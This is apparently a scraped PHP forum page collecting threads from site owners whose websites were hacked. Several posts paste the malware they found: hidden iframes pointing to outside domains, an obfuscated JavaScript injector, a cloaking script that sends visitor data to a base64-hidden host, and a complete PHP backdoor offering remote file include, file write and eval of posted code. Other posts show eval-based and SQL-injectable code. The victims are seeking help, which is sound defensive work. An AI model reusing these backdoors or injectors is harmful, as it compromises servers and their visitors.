Learn VBA & Macros in 1 Week!

PHP - Hacked!

Full Excel VBA Course - Beginner to Expert

Hacked!	View Content

Hi guys, some how someone has physically changed my pages and added
Code: [Select]
<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
How have they done this, do you think they have got into our ftp account.
Heres a page with it on.

http://www.languageschoolsuk.com/coursecalculator.php

if you look at source code , right at the end near the footer you can see.

Any help and advice would be brilliant because i have nooooo idea.

Full Excel VBA Course - Beginner to Expert

How Can This Code Be Hacked?

Similar Tutorials

View Content

I know the following line of code is dangerous since the user has control of $query but I do not know any other way to realistically do it.

if (eval('return (' . $query . ');')) {

The perpose is to allow the user to type in any valid php statement and see if it evaluates true or false.

I.E.
1==1 is true
substr('cat',1,2)=='at' is true
12<6 is false

the problem is I am sure there are ways a hacker could use this code to upload code to my site and take over. I have 2 options. 1 filter out any possible way a hacker could hack it or 2 only allow the user to enter functions that can't be used to hack it. I will probably go the later route but either way I need to know what to look for.

Please let me know if you can think of any values for $query that would let you hack my site

(p.s. this code is not up yet and will not go up until any possible security flaws are fixed.)

Been Hacked - Now Need Some Advice

Similar Tutorials

View Content

Yup, the nice person left some friendly messages just to prove it. Now i need to recover. I have back up code and DB. But I need to establish what kind of hack it was and how to improve things. The big tell tale, is that all the javascript is gone off the pages. Yet the js tools ( jquery etc ) all all still there. They also got past the login page as well. The site was built with CodeIgniter so I had invested my trust in the framework as I will never assume I know more than the CI guys on security. any ideas jump to mind as to what kind of hack it was and therefore what obvious things I can do to avoid it again ? Many Thanks !!

Has My Site Been Hacked?

Similar Tutorials

View Content

My website this morning was displaying 2 iframes that I know I never put there in the code:

in index.php:
<script type="text/javascript" charset="ISO-8859-1" src="game.js"></script>

and in my public_html, there was a file called game.js that contained the following:
O="=100%iframewidthheig".split('');Q="document.write('< src=http://lolkatdska.co.in/sTDS/go.php?sid=1 ht frameborder=0 margin=0 marginht=0></>');";o="";for(J=3;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(//g,'"'));

I am the only person with the login details to my website/cpanel, and I know I never uploaded/modified these files.

I've spoken to my host, but they told me they didn't see anything (because obviously I removed these foreign objects as soon as i noticed them). They don't seem too bothered about a security risk :/

Anyway, I've changed my login details and all that.

I mentioned above that I discovered 2 foreign iframes; the other one I found just a moment ago, again on my index page (but within a file called footer.php)

in footer.php:
<iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>

How did I not notice this before??? I think it was placed there in the last hour or so, after I removed the first iframe.

This is pretty weird, I changed my login details for cpanel/ftp and all that stuff over an hour ago!!! and since then I've found this new alteration that I never made!

I dunno, maybe it was there along with the game.js iframe but I didn't notice.... but as soon as I fixed the first one, I checked, and everything was fine.

Oh, and also, the php files index and footer are now have twice the number of returns as they originally did.
e.g:
<h1><?php include("ads/index_160x600_1.php"); ?></h1>
<h2><?php include("ads/index_125x125_1.php"); ?></h2>
<h3><?php include("ads/index_125x125_2.php"); ?></h3>
Became:
<h1><?php include("ads/index_160x600_1.php"); ?></h1>

<h2><?php include("ads/index_125x125_1.php"); ?></h2>

<h3><?php include("ads/index_125x125_2.php"); ?></h3>

The only way these files could have been altered is if someone knows my login details... but this just is impossible, how did this happen?
Is any of these weird files/modification familiar to anyone else?

We had a problem with the site a month ago when google suspected our site as some sort of security threat... because we were hosting content from xxxxxxxxx.com, a site we have no affiliation with and doesn't feature on our site at all. It was all quite bizarre and the google thing went away within a day of contacting them.

I have a feeling the same person/thing was behind this also.

HELP!

Website Hacked...continued..

Similar Tutorials

View Content

Hi Chaps,

After my clients' site was hacked just over a week ago, I took down the site and made some changes to the PHP scripts.

- Backed-up the database, then removed it from the webhost
- Removed all web files
- Changed the FTP and SQL login credentials
- Encrypted all user passwords
- Secured the login/signup scripts with a Captcha tool.
- Secured all account & checkout pages with cookie checks (forces login).
- I validated all the user inputs for XSS.
- Secured the SQL scripts with mysql_real_escape_string()/strip_tags()/str_replace().
- Used HTTP_REFERER on account/checkout pages

I'm hoping this will sure up the front-end site.

Whilst I was backing up the images folder (500Mb+) to my PC, I was warned of trojans and viruses.
It turned out the hackers had placed php files (cid.php/sniper.php/etc) and a couple of files without extensions, into the main Images folder.

Without knowing how they actually did this (whether they had access to the FTP site, gained access through the website, or through a virus on the laptop used to update the site/upload images), I would like to know what I can do to make sure that they can't do this again. There is no option for front-end users to upload files, but the administration site does allow image uploads.

At the moment, the images folder permissions are set to 0775, I think this is correct.

Is there something I can do to the Image folder permissions as a whole, or should I just run a regular check on the directories, checking for all non-image files, or any file/directory that doesn't have the 0775 permission?

Are there any resources on protecting FTP folders with PHP, uploading files/directories to protected folders, good practices to continually check for unwanted files?

Is there anything else I should be looking into, I did read something about the dangers of include()/require_once()

The site is hosted on a shared server, and don't have access to the .htaccess files. Is there anything I can ask the hosting company to check that there firewall is working correctly?

Sorry for the range of questions in this, but any help or guidance would be most appreciated.

Many thanks

I Have Been Hacked And I Am Trying To Use Cookies To Help With This Issue

Similar Tutorials

View Content

I am using php 5 and I am having issues with cookies. I have looked at the help pages here but still stuck. A site had been hacked via a database and I am making it more secure with the use of session control ip address and cookies. The issue is this I need to run a database query to test if the two cookies set match that with the data in the database. I am using the following code in the head section.
Code: [Select]
<?php
session_start();
$session = session_id();
$ip = $_SERVER['REMOTE_ADDR'];
$user = stripslashes(trim($_POST['user']));
$pass = stripslashes(trim($_POST['pass']));
$username="$user";
$encrypt_user=md5($username);
$password="$pass";
$encrypt_password=md5($password);
include 'config.php';
$query = "SELECT * FROM `users`WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'";
$result = mysql_query($query) or die (mysql_error());
if (mysql_num_rows($result)>0){
while($row = mysql_fetch_row($result)){
// set the cookies
setcookie("cookie[pas]", "$encrypt_password");
setcookie("cookie[user]", "$encrypt_user");
$query = ("UPDATE`users`SET`sid`='$session', `ip` = '$ip'WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'");
$result = mysql_query($query) or die (mysql_error());
}
}
else {
echo 'No rows found';
}
?>
This works fine now when I add this bit of code I can see the cookie name and value.
Code: [Select]
<?php
echo "$ip<br>";
if (isset($_COOKIE['cookie'])) {
    foreach ($_COOKIE['cookie'] as $name => $value) {
        $name = htmlspecialchars($name);
        $value = htmlspecialchars($value);
        echo "$name : $value <br />\n";
    }
}
?>
I can see the ip address and the two cookies named user and pass but when I try to get the individual cookie details nothing comes out and this is the issue as I need to test each of the two individual cookies against the info in the database so I can include pages to make it all secure. I have tried
Code: [Select]
<?php
if (isset($_COOKIE['user'])) {
        echo "$encrypt_user";
    }
?>encrypt_user being the username from the form. I have also tried

Code: [Select]
<?php
if (isset($_COOKIE['user'])) {
        echo "$_COOKIE['user']";
    }
?>
These are not showing. I do not need to see it just run a query to test that each cookie matches the encrypt data in the MySQL. Any ideas would be great if you can help and if not have a great weekend

Website Hacked...strange

Similar Tutorials

View Content

The code below was inserted into every single index.php on one of my clients sites. It went through and every single index.php page (in each folder) had that following code put in. It was
strange. As far as I can tell there are no FTP logs, besides my own IP. This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a
full security audit yet. What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <?
is inserted right after it. I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange.

Any advice on how this is generally done, and anyone with similar issues?
Code: [Select]
<? require_once('security.inc.php'); ?><?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

I Believe The Form Submission On Our Website Has Been Hacked....

Similar Tutorials

View Content

I have a php form submission on this website: www.judelawllc.com

There are several required fields...and when I try to get around them, I am unable to?? Yet, over the last week...we have been getting upwards of 500 submissions that are completely blank? I don't understand how that is possible...or how to correct it. I have tried to add a captcha to the form to add further protection, but the captcha image is too big for the space I have to put this form. I don't like the layout of this site, but I am stuck with it for now...could you let me know what information I can supply you to help figure out how this is happening?

Thank you in advance!

Code Found Hacked Onto Server - What Does It Do?

Similar Tutorials

View Content

I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop.

If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds.

Code: [Select]
<?php //e6b03bed4190733c7534e5c1209b076f

/**
* @version 2.42
*
*/
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        include $code;
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if ($res)
                {
                        $installed[] = $projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);

                if ($res)
                {
                        $removed[] = $projectcode["id"];
                }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
*/
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);

        eval($code);
        //return;
}

?>

Config.php Storing Db Username And Password, Hacked??

Similar Tutorials

View Content

Hey guys I have a simple question,

I have a Config.php file that connects to mysql database on my server...

Something like this (modified data, of course):

<?php
// database information
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '******';
$dbname = 'databasename';
?>

Can a hacker access those variables? How can I protect this?
Ideas, suggestions?

Thanks in advance!

Shared Server Hacked, Need To Find All Php Files In Any Directory Named "img"

Similar Tutorials

View Content

Hey, friends. I have some trouble on the server front. My sites have been hacked, and I need to make sure I've eradicated every trace of this exploit. I'm looking for a way to search for any and all php files contained in multiple directories with specific names. For instance, I have found a commonality in relation to where these malicious files are placed, such as:
Code: [Select]
/some/dir/img/somename.phpor:
Code: [Select]
/some/dir/js/somename.php
Is there a way I can easily (e.g. using ssh and the "find" command) locate all files ending in php but only found in directories named "img"? I can't seem to find anything that would allow me to do this with find, or with a combination of find and grep. I can't go directory by directory, as some of these img directories are created many levels deep, some even in .svn directories.

Any and all help is appreciated. Hackers suck.